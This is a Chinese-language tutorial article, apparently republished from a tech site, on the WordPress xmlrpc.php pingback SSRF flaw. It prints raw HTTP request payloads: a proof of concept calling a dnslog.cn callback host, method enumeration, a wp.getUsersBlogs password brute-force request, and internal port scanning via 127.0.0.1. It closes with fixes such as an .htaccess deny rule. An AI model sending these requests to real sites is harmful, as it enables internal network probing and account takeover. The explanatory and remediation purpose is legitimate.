WordPress xmlrpc.php漏洞和SSRF是怎样的,如何修复
导读:这篇文章给大家分享的是“WordPress xmlrpc.php漏洞和SSRF是怎样的,如何修复”,文中的讲解内容简单清晰,易于理解,而且实用性强吗,对大家认识和了解“WordPress xmlrpc.php漏洞和SSRF是怎样的,如何修复...
这篇文章给大家分享的是“WordPress xmlrpc.php漏洞和SSRF是怎样的,如何修复”,文中的讲解内容简单清晰,易于理解,而且实用性强吗,对大家认识和了解“WordPress xmlrpc.php漏洞和SSRF是怎样的,如何修复”都有一定的帮助,有需要的朋友可以参考了解看看,那么接下来就跟随小编的思路来往下学习吧一、漏洞介绍
通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。
二、漏洞影响
WordPress 版本 3.5.1
造成的影响
1、可以对业务内网进行探测。
2、攻击运行在内网或本地的应用程序(比如溢出攻击)。
3、利用file协议读取本地文件等
三、漏洞复现
第一步:直接访问这个文件,初步判断
第二步:发现POC验证数据包
POST /xmlrpc.php HTTP/1.1 Host: www.目标.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,*/*; q=0.8 Accept-Language: zh-CN,zh; q=0.8,zh-TW; q=0.7,zh-HK; q=0.5,en-US; q=0.3,en; q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 310 ?xml version="1.0" encoding="iso-8859-1"?> methodCall> methodName> pingback.ping/methodName> params> param> value> string> http://g8o53x.dnslog.cn//string> /value> /param> param> value> string> http://www.目标.com/?p=1/string> /value> /param> /params> /methodCall>
发送数据包
验证成功 !
四、深入利用
(一)查看系统允许的方法
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 ...... methodCall> methodName> system.listMethods/methodName> params> /params> /methodCall>
(二)账号爆破
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 ...... methodCall> methodName> wp.getUsersBlogs/methodName> params> param> value> admin/value> /param> param> value> password/value> /param> /params> /methodCall>
(三)通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 ....... methodCall> methodName> pingback.ping/methodName> params> param> value> string> 要探测的ip和端口:http://127.0.0.1:80/string> /value> /param> param> value> string> 要探测的URL/string> /value> /param> /params> /methodCall>
五、漏洞修复
(一)通过APACHE的.htaccess屏蔽xmlrpc.php文件的访问。配置代码如下:
# protect xmlrpc Files "xmlrpc.php"> Order Allow,Deny Deny from all /Files>
(二)删除根目录下的xmlrpc.php。
到此这篇关于“WordPress xmlrpc.php漏洞和SSRF是怎样的,如何修复”的文章就介绍到这了,感谢各位的阅读,更多相关WordPress xmlrpc.php漏洞和SSRF是怎样的,如何修复内容,欢迎关注网络资讯频道,小编将为大家输出更多高质量的实用文章!
声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!
若转载请注明出处: WordPress xmlrpc.php漏洞和SSRF是怎样的,如何修复
本文地址: https://pptw.com/jishu/652884.html